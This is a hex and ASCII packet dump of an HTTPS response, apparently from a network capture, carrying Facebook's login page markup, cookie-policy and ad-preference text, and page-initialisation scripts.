                                                                                                                                  2022-10-17 20:07:20 UTC1137INData Raw: 6f 72 6b 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 5c 2f 75 6c 3e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6f 30 5c 22 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6b 5c 22 3e 4f 74 68 65 72 20 77 61 79 73 20 79 6f 75 20 63 61 6e 20 63 6f 6e 74 72 6f 6c 20 79 6f 75 72 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c
                                                                                                                                  Data Ascii: ork\u003C\/li>\u003C\/ul>\u003C\/p>\u003C\/div>\u003C\/p>\u003C\/div>\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv class=\"_9xo0\">\u003C\/div>\u003C\/div>\u003Cdiv>\u003Cp class=\"_9o-k\">Other ways you can control your information\u003C\/p>\u003C\/div>\
                                                                                                                                  2022-10-17 20:07:20 UTC1138INData Raw: 73 69 6e 67 20 79 6f 75 72 20 61 64 20 70 72 65 66 65 72 65 6e 63 65 73 20 74 6f 20 64 65 74 65 72 6d 69 6e 65 20 77 68 69 63 68 20 61 64 73 20 79 6f 75 20 6d 61 79 20 62 65 20 69 6e 74 65 72 65 73 74 65 64 20 69 6e 20 73 65 65 69 6e 67 2e 20 59 6f 75 20 63 61 6e 20 63 6f 6e 74 72 6f 6c 20 74 68 69 73 20 69 6e 20 79 6f 75 72 20 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 73 65 74 74 69 6e 67 73 5c 2f 61 64 73 5c 2f 5c 22 3e 61 64 20 73 65 74 74 69 6e 67 73 5c 75 30 30 33 43 5c 2f 61 3e 2e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 73 69 2d 5c 22 3e 41 64 20 70 72 65 66 65 72 65 6e 63 65 73 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30
                                                                                                                                  Data Ascii: sing your ad preferences to determine which ads you may be interested in seeing. You can control this in your \u003Ca href=\"https:\/\/www.facebook.com\/settings\/ads\/\">ad settings\u003C\/a>.\u003C\/p>\u003Cp class=\"_9si-\">Ad preferences\u003C\/p>\u00
                                                                                                                                  2022-10-17 20:07:20 UTC1139INData Raw: 73 73 3d 5c 22 69 6d 67 20 73 70 5f 51 76 36 44 33 48 54 65 5a 55 59 20 73 78 5f 33 61 36 38 31 38 5c 22 3e 5c 75 30 30 33 43 5c 2f 69 3e 5c 75 30 30 33 43 5c 2f 73 70 61 6e 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 62 75 74 74 6f 6e 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 62 20 5f 39 6e 67 61 5c 22 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6d 5c 22 3e 59 6f 75 20 63 61 6e 20 6f 70 74 20 6f 75 74 20 6f 66 20 73 65 65 69 6e 67 20 6f 6e 6c 69 6e 65 20 69 6e 74 65 72 65 73 74 2d 62 61 73 65 64 20 61 64 73 20 66 72 6f 6d 20 46 61 63 65 62 6f 6f 6b 20 61 6e 64 20 6f 74 68 65 72 20 70 61 72 74 69 63 69 70 61 74 69 6e 67 20 63 6f 6d 70 61 6e 69 65 73 20 74 68 72
                                                                                                                                  Data Ascii: ss=\"img sp_Qv6D3HTeZUY sx_3a6818\">\u003C\/i>\u003C\/span>\u003C\/div>\u003C\/button>\u003Cdiv class=\"_9ngb _9nga\">\u003Cdiv>\u003Cp class=\"_9o-m\">You can opt out of seeing online interest-based ads from Facebook and other participating companies thr
                                                                                                                                  2022-10-17 20:07:20 UTC1140INData Raw: 33 34 36 64 0d 0a 48 42 66 63 54 76 6a 6c 69 4e 52 47 70 71 39 42 33 43 67 6d 46 47 32 66 77 67 49 6e 4d 32 70 78 4c 48 6c 46 64 55 36 4d 43 78 4d 46 66 36 71 6d 31 79 4e 6a 33 31 68 4e 5f 4b 6d 34 38 56 61 62 65 70 38 7a 35 72 31 30 6c 57 63 44 35 67 52 4f 64 30 4d 55 36 47 71 63 64 69 58 36 52 79 55 71 4c 51 66 35 34 69 73 5f 74 44 6d 71 37 36 59 51 5a 76 6c 69 32 4e 32 4c 4d 49 70 72 46 43 36 76 2d 38 6b 67 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 6c 61 7a 79 5c 22 3e 44 69 67 69 74 61 6c 20 41 64 76 65 72 74 69 73 69 6e 67 20 41 6c 6c 69 61 6e 63 65 20 6f 66 20 43 61 6e 61 64 61 5c 75 30
                                                                                                                                  Data Ascii: 346dHBfcTvjliNRGpq9B3CgmFG2fwgInM2pxLHlFdU6MCxMFf6qm1yNj31hN_Km48Vabep8z5r10lWcD5gROd0MU6GqcdiX6RyUqLQf54is_tDmq76YQZvli2N2LMIprFC6v-8kg\" target=\"_blank\" rel=\"noopener nofollow\" data-lynx-mode=\"asynclazy\">Digital Advertising Alliance of Canada\u0
                                                                                                                                  2022-10-17 20:07:20 UTC1142INData Raw: 72 65 6c 3d 5c 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 6c 61 7a 79 5c 22 3e 44 69 67 69 74 61 6c 20 41 64 76 65 72 74 69 73 69 6e 67 20 41 6c 6c 69 61 6e 63 65 5c 75 30 30 33 43 5c 2f 61 3e 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 6c 69 3e 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 79 6f 75 72 61 64 63 68 6f 69 63 65 73 2e 63 61 5c 75 30 30 32 35 32 46 26 61 6d 70 3b 68 3d 41 54 32 53 56 79 79 48 4f 55 6b 37 36 4b 56 78 31 53 31 52 69 7a 6f 4c 55 47 65 36 61 53 6f 58 67
                                                                                                                                  Data Ascii: rel=\"noopener nofollow\" data-lynx-mode=\"asynclazy\">Digital Advertising Alliance\u003C\/a>\u003C\/li>\u003Cli>\u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Fyouradchoices.ca\u00252F&amp;h=AT2SVyyHOUk76KVx1S1RizoLUGe6aSoXg
                                                                                                                                  2022-10-17 20:07:20 UTC1143INData Raw: 6f 75 20 74 6f 20 63 68 6f 6f 73 65 20 77 68 65 74 68 65 72 20 62 72 6f 77 73 65 72 20 63 6f 6f 6b 69 65 73 20 61 72 65 20 73 65 74 20 61 6e 64 20 74 6f 20 64 65 6c 65 74 65 20 74 68 65 6d 2e 20 54 68 65 73 65 20 63 6f 6e 74 72 6f 6c 73 20 76 61 72 79 20 62 79 20 62 72 6f 77 73 65 72 2c 20 61 6e 64 20 6d 61 6e 75 66 61 63 74 75 72 65 72 73 20 6d 61 79 20 63 68 61 6e 67 65 20 62 6f 74 68 20 74 68 65 20 73 65 74 74 69 6e 67 73 20 74 68 65 79 20 6d 61 6b 65 20 61 76 61 69 6c 61 62 6c 65 20 61 6e 64 20 68 6f 77 20 74 68 65 79 20 77 6f 72 6b 20 61 74 20 61 6e 79 20 74 69 6d 65 2e 20 41 73 20 6f 66 20 35 20 4f 63 74 6f 62 65 72 20 32 30 32 30 2c 20 79 6f 75 20 6d 61 79 20 66 69 6e 64 20 61 64 64 69 74 69 6f 6e 61 6c 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62
                                                                                                                                  Data Ascii: ou to choose whether browser cookies are set and to delete them. These controls vary by browser, and manufacturers may change both the settings they make available and how they work at any time. As of 5 October 2020, you may find additional information ab
                                                                                                                                  2022-10-17 20:07:20 UTC1145INData Raw: 32 46 5c 75 30 30 32 35 32 46 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 5c 75 30 30 32 35 32 46 65 6e 2d 55 53 5c 75 30 30 32 35 32 46 6b 62 5c 75 30 30 32 35 32 46 65 6e 61 62 6c 65 2d 61 6e 64 2d 64 69 73 61 62 6c 65 2d 63 6f 6f 6b 69 65 73 2d 77 65 62 73 69 74 65 2d 70 72 65 66 65 72 65 6e 63 65 73 26 61 6d 70 3b 68 3d 41 54 32 6c 6d 34 39 30 32 4d 4d 6d 62 2d 33 78 44 74 71 4d 4c 4a 36 44 2d 48 75 47 48 6a 6f 30 64 74 41 6c 77 48 62 43 68 38 4d 56 63 63 63 47 71 6b 51 37 51 37 4b 5a 37 55 73 2d 4f 6f 55 47 74 33 7a 37 48 54 56 6a 6a 74 4b 39 59 51 6a 2d 59 72 73 57 5f 63 4f 32 75 42 71 2d 42 42 74 59 4a 34 33 66 79 75 6d 63 59 46 62 5a 2d 32 6c 59 51 38 6a 5f 58 38 35 4e 4c 52 61 73 75 64 62 77 51 4b 38 36 4f 61 39 55 6b 71 4a 6e 74 67
                                                                                                                                  Data Ascii: 2F\u00252Fsupport.mozilla.org\u00252Fen-US\u00252Fkb\u00252Fenable-and-disable-cookies-website-preferences&amp;h=AT2lm4902MMmb-3xDtqMLJ6D-HuGHjo0dtAlwHbCh8MVcccGqkQ7Q7KZ7Us-OoUGt3z7HTVjjtK9YQj-YrsW_cO2uBq-BBtYJ43fyumcYFbZ-2lYQ8j_X85NLRasudbwQK86Oa9UkqJntg
                                                                                                                                  2022-10-17 20:07:20 UTC1146INData Raw: 68 4a 76 62 32 33 54 75 41 76 62 72 66 7a 30 77 32 43 56 44 66 6c 73 44 6f 42 52 70 75 50 51 38 46 6c 65 33 72 59 4d 64 79 6d 4b 64 53 46 41 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 6c 61 7a 79 5c 22 3e 4f 70 65 72 61 5c 75 30 30 33 43 5c 2f 61 3e 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 5c 2f 75 6c 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63
                                                                                                                                  Data Ascii: hJvb23TuAvbrfz0w2CVDflsDoBRpuPQ8Fle3rYMdymKdSFA\" target=\"_blank\" rel=\"noopener nofollow\" data-lynx-mode=\"asynclazy\">Opera\u003C\/a>\u003C\/li>\u003C\/ul>\u003C\/div>\u003C\/div>\u003C\/div>\u003C\/div>\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv c
                                                                                                                                  2022-10-17 20:07:20 UTC1148INData Raw: 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 61 5f 66 48 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 4e 65 64 65 72 6c 61 6e 64 73 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 62 5f 2b 62 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 4e 6f 72 73 6b 20 28 62 6f 6b 6d 5c 75 30 30 65 35 6c 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 63 5f 44 54 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 50 6f 6c 73 6b 69 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 64 5f 70 57 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 50 6f 72 74 75 67 75 5c 75 30 30 65 61 73 20 28 42 72 61 73 69 6c 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30
                                                                                                                                  Data Ascii: markup_3310c079_0_a_fH",{"__html":"Nederlands"},1],["__markup_3310c079_0_b_+b",{"__html":"Norsk (bokm\u00e5l)"},1],["__markup_3310c079_0_c_DT",{"__html":"Polski"},1],["__markup_3310c079_0_d_pW",{"__html":"Portugu\u00eas (Brasil)"},1],["__markup_3310c079_0
                                                                                                                                  2022-10-17 20:07:20 UTC1149INData Raw: 7d 2c 31 5d 5d 2c 22 65 6c 65 6d 65 6e 74 73 22 3a 5b 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 31 5f 56 4a 22 2c 22 75 5f 30 5f 30 5f 42 47 22 2c 31 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 30 5f 70 46 22 2c 22 67 6c 6f 62 61 6c 43 6f 6e 74 61 69 6e 65 72 22 2c 32 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 32 5f 42 4f 22 2c 22 63 6f 6e 74 65 6e 74 22 2c 31 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 38 33 35 63 36 33 33 61 5f 30 5f 30 5f 35 59 22 2c 22 6c 6f 67 69 6e 5f 66 6f 72 6d 22 2c 32 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 66 34 36 66 34 39 34 36 5f 30 5f 30 5f 2b 6f 22 2c 22 75 5f 30 5f 32 5f 6f 77 22 2c 31 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 66 34 36 66 34 39 34 36 5f 30 5f 31 5f 56 61 22 2c 22 75 5f
                                                                                                                                  Data Ascii: },1]],"elements":[["__elem_a588f507_0_1_VJ","u_0_0_BG",1],["__elem_a588f507_0_0_pF","globalContainer",2],["__elem_a588f507_0_2_BO","content",1],["__elem_835c633a_0_0_5Y","login_form",2],["__elem_f46f4946_0_0_+o","u_0_2_ow",1],["__elem_f46f4946_0_1_Va","u_
                                                                                                                                  2022-10-17 20:07:20 UTC1151INData Raw: 46 22 5d 2c 5b 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 30 5f 70 46 22 7d 5d 5d 5d 2c 5b 22 4b 65 79 62 6f 61 72 64 41 63 74 69 76 69 74 79 4c 6f 67 67 65 72 22 2c 22 69 6e 69 74 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 46 6f 63 75 73 52 69 6e 67 22 2c 22 69 6e 69 74 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 45 72 72 6f 72 4d 65 73 73 61 67 65 43 6f 6e 73 6f 6c 65 22 2c 22 6c 69 73 74 65 6e 46 6f 72 55 6e 63 61 75 67 68 74 45 72 72 6f 72 73 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 48 61 72 64 77 61 72 65 43 53 53 22 2c 22 69 6e 69 74 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 57 65 62 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 53 65 6c 65 63 74 6f 72 48 61 6e 64 6c 65 72 22 2c 22 69 6e 69 74 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 65 63 37 37 61 66 62 64 5f 30 5f
                                                                                                                                  Data Ascii: F"],[[{"__m":"__elem_a588f507_0_0_pF"}]]],["KeyboardActivityLogger","init",[],[]],["FocusRing","init",[],[]],["ErrorMessageConsole","listenForUncaughtErrors",[],[]],["HardwareCSS","init",[],[]],["WebCookieLocaleSelectorHandler","init",["__elem_ec77afbd_0_
                                                                                                                                  2022-10-17 20:07:20 UTC1152INData Raw: 65 72 50 72 65 66 69 6c 6c 4c 6f 67 67 69 6e 67 22 2c 22 69 6e 69 74 50 61 73 73 77 6f 72 64 46 69 65 6c 64 4c 6f 67 67 69 6e 67 22 2c 5b 5d 2c 5b 7b 22 70 61 73 73 77 6f 72 64 46 69 65 6c 64 49 44 22 3a 22 70 61 73 73 22 7d 5d 5d 2c 5b 22 4c 6f 67 69 6e 46 6f 72 6d 54 6f 67 67 6c 65 22 2c 22 69 6e 69 74 54 6f 67 67 6c 65 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 33 5f 42 62 22 2c 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 34 5f 79 67 22 2c 22 5f 5f 65 6c 65 6d 5f 37 30 62 31 36 63 36 39 5f 30 5f 30 5f 30 66 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 33 5f 42 62 22 7d 2c 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 34 5f 79 67 22 7d 2c 7b
                                                                                                                                  Data Ascii: erPrefillLogging","initPasswordFieldLogging",[],[{"passwordFieldID":"pass"}]],["LoginFormToggle","initToggle",["__elem_a588f507_0_3_Bb","__elem_a588f507_0_4_yg","__elem_70b16c69_0_0_0f"],[{"__m":"__elem_a588f507_0_3_Bb"},{"__m":"__elem_a588f507_0_4_yg"},{
                                                                                                                                  2022-10-17 20:07:20 UTC1153INData Raw: 31 32 62 62 0d 0a 6c 65 61 6e 75 70 28 54 69 6d 65 53 6c 69 63 65 29 7d 29 7d 29 3b 7d 29 3b 0a 0a 6f 6e 6c 6f 61 64 52 65 67 69 73 74 65 72 5f 44 45 50 52 45 43 41 54 45 44 28 66 75 6e 63 74 69 6f 6e 20 28 29 7b 62 65 67 69 6e 5f 70 6f 6c 6c 69 6e 67 5f 6c 6f 67 69 6e 5f 63 6f 6f 6b 69 65 73 28 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 61 64 73 5c 2f 6d 61 6e 61 67 65 72 5c 2f 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 5c 2f 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 29 3b 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 6e 6f 77 5f 69 6e 6c 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 70 3d 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 3b 72 65 74 75 72 6e 20 70 26 26 70
                                                                                                                                  Data Ascii: 12bbleanup(TimeSlice)})});});onloadRegister_DEPRECATED(function (){begin_polling_login_cookies("https:\/\/www.facebook.com\/ads\/manager\/account_settings\/account_billing");});</script><script>now_inl=(function(){var p=window.performance;return p&&p
                                                                                                                                  2022-10-17 20:07:20 UTC1155INData Raw: 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 65 2f 72 2f 5f 53 36 62 5a 63 32 4e 72 71 7a 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 63 72 69 70 74 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6e 6f 6e 63 65 3d 22 6d 71 36 6d 4f 76 59 54 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 69 37 4d 35 34 2f 79 4b 2f 6c 2f 65 6e 5f 55 53 2f 37 58 46 72 73 4d 5a
                                                                                                                                  Data Ascii: " /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/ye/r/_S6bZc2Nrqz.js?_nc_x=Ij3Wp8lg5Kz" as="script" crossorigin="anonymous" nonce="mq6mOvYT" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3i7M54/yK/l/en_US/7XFrsMZ
                                                                                                                                  2022-10-17 20:07:20 UTC1156INData Raw: 2f 76 33 2f 79 69 2f 6c 2f 30 2c 63 72 6f 73 73 2f 75 61 52 55 5a 6b 31 38 79 4e 49 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 6b 2f 6c 2f 30 2c 63 72 6f 73 73 2f 67 33 64 76 69 2d 76 64 77 45 36 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72
                                                                                                                                  Data Ascii: /v3/yi/l/0,cross/uaRUZk18yNI.css?_nc_x=Ij3Wp8lg5Kz" as="style" crossorigin="anonymous" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yk/l/0,cross/g3dvi-vdwE6.css?_nc_x=Ij3Wp8lg5Kz" as="style" crossorigin="anonymous" /><link rel="pr
                                                                                                                                  2022-10-17 20:07:20 UTC1158INData Raw: 22 5a 38 7a 36 59 6f 30 22 2c 22 63 68 58 77 50 72 55 22 2c 22 41 39 63 69 56 42 39 22 2c 22 58 39 6e 72 36 35 61 22 2c 22 50 4d 45 73 2f 6f 79 22 2c 22 65 4d 6b 4d 78 48 5a 22 2c 22 39 79 6f 4e 79 58 58 22 2c 22 51 4d 54 46 61 33 6c 22 2c 22 59 76 33 35 4f 66 32 22 2c 22 55 66 71 36 59 57 58 22 2c 22 52 35 77 31 72 43 4a 22 2c 22 6f 2f 75 6e 79 72 6e 22 2c 22 50 30 67 55 4c 47 6f 22 2c 22 43 47 6b 48 34 46 59 22 2c 22 65 39 41 4e 7a 77 2f 22 2c 22 6f 77 65 73 41 33 50 22 2c 22 52 4d 34 4d 52 34 6e 22 2c 22 41 70 47 35 56 4b 34 22 5d 7d 29 3b 7d 29 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 5f 5f 62 69 67 50 69 70 65 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 62 69 67 50 69 70 65 29 7b 62 69 67 50 69 70
                                                                                                                                  Data Ascii: "Z8z6Yo0","chXwPrU","A9ciVB9","X9nr65a","PMEs/oy","eMkMxHZ","9yoNyXX","QMTFa3l","Yv35Of2","Ufq6YWX","R5w1rCJ","o/unyrn","P0gULGo","CGkH4FY","e9ANzw/","owesA3P","RM4MR4n","ApG5VK4"]});}));</script><script>requireLazy(["__bigPipe"],function(bigPipe){bigPip
                                                                                                                                  2022-10-17 20:07:20 UTC1159INData Raw: 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 42 61 6e 7a 61 69 42 61 73 65 22 2c 22 41 61 32 52 72 53 4b 57 75 50 35 63 73 67 69 2d 51 43 74 37 37 72 53 36 64 6e 73 30 6b 47 74 66 30 6b 49 36 7a 70 65 71 6c 38 34 78 72 68 49 47 31 4e 56 36 71 79 68 47 4d 6c 54 70 76 33 4e 51 76 58 66 44 62 72 43 55 75 4a 56 47 53 54 77 44 5a 56 52 54 6b 68 35 44 44 31 41 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 34 35 38 31 31 33 22 2c 5b 5d 2c 7b 5f 5f 72 63 3a 5b 6e 75 6c 6c 2c 22 41 61 33 69 41 72 52 4e 75 30 4a 4f 58 35 6f 71 66 31 32 33 68 46 58 7a 31 6b 6d 59 71 4f 6b 30 44 54 35 41 6c 49 56 6e 77 55 56 36 67 64 31 42 30 65 6d 6a 39 4e 61 34 32 64 4a 70 58 2d 79 35 5a 68 39 58 73 33 57 68 6e 62 51 57 36 50 36 44 6c 6d 67 69 6a 31 4c 78 68 36 63 4a 7a 76 41 22 5d 7d 2c 2d 31 5d
                                                                                                                                  Data Ascii: "],{__rc:["BanzaiBase","Aa2RrSKWuP5csgi-QCt77rS6dns0kGtf0kI6zpeql84xrhIG1NV6qyhGMlTpv3NQvXfDbrCUuJVGSTwDZVRTkh5DD1A"]},-1],["cr:1458113",[],{__rc:[null,"Aa3iArRNu0JOX5oqf123hFXz1kmYqOk0DT5AlIVnwUV6gd1B0emj9Na42dJpX-y5Zh9Xs3WhnbQW6P6Dlmgij1Lxh6cJzvA"]},-1]
                                                                                                                                  2022-10-17 20:07:20 UTC1161INData Raw: 4c 5f 30 55 32 74 44 34 6f 45 73 4d 5f 42 5a 35 7a 49 33 34 64 7a 6f 4d 65 72 66 6d 70 78 62 2d 73 6f 5a 71 41 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 39 37 31 34 37 33 22 2c 5b 22 4c 61 79 65 72 48 69 64 65 4f 6e 54 72 61 6e 73 69 74 69 6f 6e 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 4c 61 79 65 72 48 69 64 65 4f 6e 54 72 61 6e 73 69 74 69 6f 6e 22 2c 22 41 61 32 52 72 53 4b 57 75 50 35 63 73 67 69 2d 51 43 74 37 37 72 53 36 64 6e 73 30 6b 47 74 66 30 6b 49 36 7a 70 65 71 6c 38 34 78 72 68 49 47 31 4e 56 36 71 79 68 47 4d 6c 54 70 76 33 4e 51 76 58 66 44 62 72 43 55 75 4a 56 47 53 54 77 44 5a 56 52 54 6b 68 35 44 44 31 41 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 31 30 35 31 35 34 22 2c 5b 5d 2c 7b 5f 5f 72 63 3a 5b 6e 75 6c 6c 2c 22 41 61 33 39 45 35 55 48 50 32
                                                                                                                                  Data Ascii: L_0U2tD4oEsM_BZ5zI34dzoMerfmpxb-soZqA"]},-1],["cr:971473",["LayerHideOnTransition"],{__rc:["LayerHideOnTransition","Aa2RrSKWuP5csgi-QCt77rS6dns0kGtf0kI6zpeql84xrhIG1NV6qyhGMlTpv3NQvXfDbrCUuJVGSTwDZVRTkh5DD1A"]},-1],["cr:1105154",[],{__rc:[null,"Aa39E5UHP2
